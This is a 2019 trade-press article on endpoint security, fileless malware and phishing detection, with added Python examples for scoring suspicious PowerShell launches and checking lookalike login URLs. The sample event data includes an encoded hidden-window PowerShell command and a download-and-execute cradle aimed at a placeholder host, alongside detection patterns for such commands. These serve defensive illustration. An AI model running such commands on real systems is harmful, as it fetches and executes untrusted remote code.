Security Market Segment LS
Tuesday, 05 March 2019 17:05

Time to review endpoint security: Trend Micro exec

By Stephen Withers

Trend Micro global vice-president of market strategy Eric Skinner

Changes in the threat landscape mean organisations should take a fresh look at their endpoint security measures, Trend Micro global vice-president of market strategy Eric Skinner has told iTWire.

Fileless malware represents "a rapid evolution in the threat landscape" and its incidence increased by 819% between August 2017 and December 2018, Skinner observed.

One reason for the rapid increase in fileless malware was that most organisations had managed to get ransomware under control, so "the attackers have shifted to something new".

The technique generally involves using legitimate software such as PowerShell to perform unauthorised actions on victim systems. This makes it effectively invisible to older types of endpoint security software, he said.

Endpoint security was a "sleepy space" around five years ago, he said, and some administrators had got into the habit of disabling the advanced features of their security software.

But simply scanning files is not going to be effective against fileless malware, so endpoint security software needs to look at the way the system is behaving. For example, is PowerShell being launched by another application? Is there an unusual pattern of memory activity?
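The behavioural questions above (who launched PowerShell, and how) can be turned into a simple scoring rule over process-creation telemetry. The following is an added example written for this page, not Trend Micro code; the events are constructed in a Sysmon-like shape, and the list of unusual parent processes, the command-line traits and their weights are assumptions to be tuned for a given estate.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"pid": 4122,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    {"pid": 4130,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"pid": 4140,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
    {"pid": 4150,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
]

# Parents that have no routine business launching a shell (assumption: tune to your estate).
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                   "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits, each with a weight. None is proof on its own; the combination matters.
COMMAND_LINE_TRAITS = [
    ("encoded command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}", re.I), 2),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 2),
    ("execution policy bypass", re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
]

ALERT_THRESHOLD = 3  # assumed cut-off: an unusual parent alone is enough to alert


def basename(path):
    """Last path component of a Windows or POSIX path, lowercased."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event; non-PowerShell events score 0."""
    if basename(event["image"]) != "powershell.exe":
        return 0, []
    score, reasons = 0, []
    parent = basename(event["parent_image"])
    if parent in UNUSUAL_PARENTS:
        score += 3
        reasons.append(f"launched by {parent}")
    for label, pattern, weight in COMMAND_LINE_TRAITS:
        if pattern.search(event["command_line"]):
            score += weight
            reasons.append(label)
    return score, reasons


def find_alerts(events, threshold=ALERT_THRESHOLD):
    """Events whose score reaches the threshold, with the reasons that got them there."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"pid": event["pid"], "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(f"pid {alert['pid']}: score {alert['score']} ({', '.join(alert['reasons'])})")
```

Run against the sample events, the Word-launched encoded command and the mshta-launched download cradle are alerted, while the scheduled-task style script run under svchost scores only one point for its execution-policy flag and is left alone. That last case is the point of scoring rather than single-trait matching: a file scanner sees nothing in any of these, and a rule that fires on every `-ExecutionPolicy Bypass` would drown analysts in administrative scripts.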

This means administrators need to ensure that their incumbent security product is being used to its full potential, said Skinner, and to consider other options if they are using a product that isn't up to the job in 2019.

Email is currently the most common method of launching attacks, and while Trend Micro says the traditional shotgun approach (blasting an email to millions of addresses in the hope that even a small percentage of recipients will be taken in) is still in use and relatively easy to spot, carefully targeted emails are being used for spearphishing and BEC (business email compromise) attacks.

In both cases, the messages show a good command of English, address the recipient by name, and indicate a degree of research (e.g., using information drawn from sites such as LinkedIn), Skinner said.

Around a year ago, Trend Micro introduced Writing Style DNA to help determine how likely it is that a particular email actually originated from the apparent sender.

More recently, it has begun rendering the destination pages of the links in an email and applying machine vision to the resulting image to help detect spoofed login pages designed to steal the victim's credentials (phishing). The advantage of this approach is that it doesn't require knowledge of domains used for phishing: if the page resembles (say) the Office 365 login page but isn't part of the relevant Microsoft domain(s), then it is highly suspicious.
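The second half of that logic, checking whether a page that looks like a given brand's login page is actually served from that brand's domains, is shown below as an added example that is not Trend Micro's code. The machine-vision classifier is not implemented; `detected_brand` stands in for its output. The brand-to-domain allowlist is a constructed assumption, and the suffix match is a simplification of what a production system would do with a public suffix list.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist: the domains under which each brand's real login pages are served.
# Assumption for this example; a production list would be maintained per brand.
BRAND_DOMAINS = {
    "office365": {"microsoftonline.com", "microsoft.com", "live.com", "office.com"},
    "examplebank": {"examplebank.example"},
}


def host_of(url):
    """Hostname of a URL with userinfo, port and brackets stripped (None if absent).

    Using the parsed hostname rather than a substring search matters: a URL such as
    https://login.microsoftonline.com@203.0.113.5/ is served by 203.0.113.5, not Microsoft.
    """
    return urlsplit(url).hostname


def host_belongs_to(host, domains):
    """True only when host equals one of the domains or is a subdomain of one.

    The leading dot keeps 'microsoftonline.com.evil.example' and 'notmicrosoft.com' out.
    """
    return any(host == d or host.endswith("." + d) for d in domains)


def assess_login_page(url, detected_brand):
    """Combine the brand a page-image classifier reported with the URL the page came from.

    detected_brand stands in for the output of the machine-vision step described in the
    article; that classifier is not implemented here. Returns (verdict, reason).
    """
    if detected_brand is None:
        return "no-brand", "page does not resemble a known login page"
    host = host_of(url)
    if host is None:
        return "suspicious", "URL has no host"
    try:
        ipaddress.ip_address(host)
        return "suspicious", f"{detected_brand} login page served from bare IP address {host}"
    except ValueError:
        pass  # not an IP literal, carry on
    domains = BRAND_DOMAINS.get(detected_brand)
    if domains is None:
        return "unknown-brand", f"no domain list for brand {detected_brand}"
    if host_belongs_to(host, domains):
        return "likely-legitimate", f"{host} is within the known domains for {detected_brand}"
    if host.startswith("xn--") or ".xn--" in host:
        return "suspicious", f"resembles {detected_brand} login but {host} is an internationalised lookalike"
    return "suspicious", f"resembles {detected_brand} login but {host} is outside its domains"


if __name__ == "__main__":
    # Constructed cases: one real-looking Microsoft URL and several impostor shapes.
    cases = [
        ("https://login.microsoftonline.com/common/oauth2/authorize", "office365"),
        ("https://login.microsoftonline.com.evil.example/login", "office365"),
        ("https://login.microsoftonline.com@203.0.113.5/login", "office365"),
        ("http://microsoftonline-com.example/login", "office365"),
        ("https://example.org/blog", None),
    ]
    for url, brand in cases:
        verdict, reason = assess_login_page(url, brand)
        print(f"{verdict:18} {url}  ({reason})")
```

The check needs no prior knowledge of the phishing domain, which is the advantage the article describes: anything that looks like the Office 365 sign-in page but is not under a Microsoft domain is treated as suspicious, including the userinfo trick and bare-IP hosts that a naive string match on "microsoftonline.com" would wave through.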

Ideally, email-borne threats should be detected before they are delivered. But the growing tendency for people to work off-site (at clients' premises, at home or in cafes, for example) coupled with the use of personal email accounts, means that the software on the device must be kept up-to-date (or at least subject to virtual patching) and equipped with endpoint security software that is capable of detecting and blocking relevant threats when the organisation's servers and firewalls haven't had the opportunity to inspect the traffic.

"The endpoint has to defend itself," Skinner said.

Another consideration is the requirement to adequately report data breaches. While older endpoint products lack forensic capabilities, newer products incorporate (often as an optional extra) endpoint detection and response technology, providing customers with an investigative toolset that can, for example, show where malware came from, whether or not it was blocked before it could take any action, which files (if any) were accessed by the malware, and whether any data was exfiltrated.

In addition, Trend Micro offers managed EDR. Unlike incident response services, managed EDR is an ongoing service that reports any detected improper activity and identifies when data breaches have occurred.

Trend Micro's cloud-based platform uses a variety of techniques including machine learning to process telemetry data from customers' systems before bringing exceptions to the attention of the company's international team of security analysts. This scale and automation means the service is "eminently affordable", he said.

With all these issues in mind, it is really important that organisations refresh their approach to endpoint security, whether they choose to stay with their incumbent vendor or move to a new provider, Skinner said.


Stephen Withers


Stephen Withers is one of Australia's most experienced IT journalists, having begun his career in the days of 8-bit 'microcomputers'. He covers the gamut from gadgets to enterprise systems. In previous lives he has been an academic, a systems programmer, an IT support manager, and an online services manager. Stephen holds an honours degree in Management Sciences and a PhD in Industrial and Business Studies.
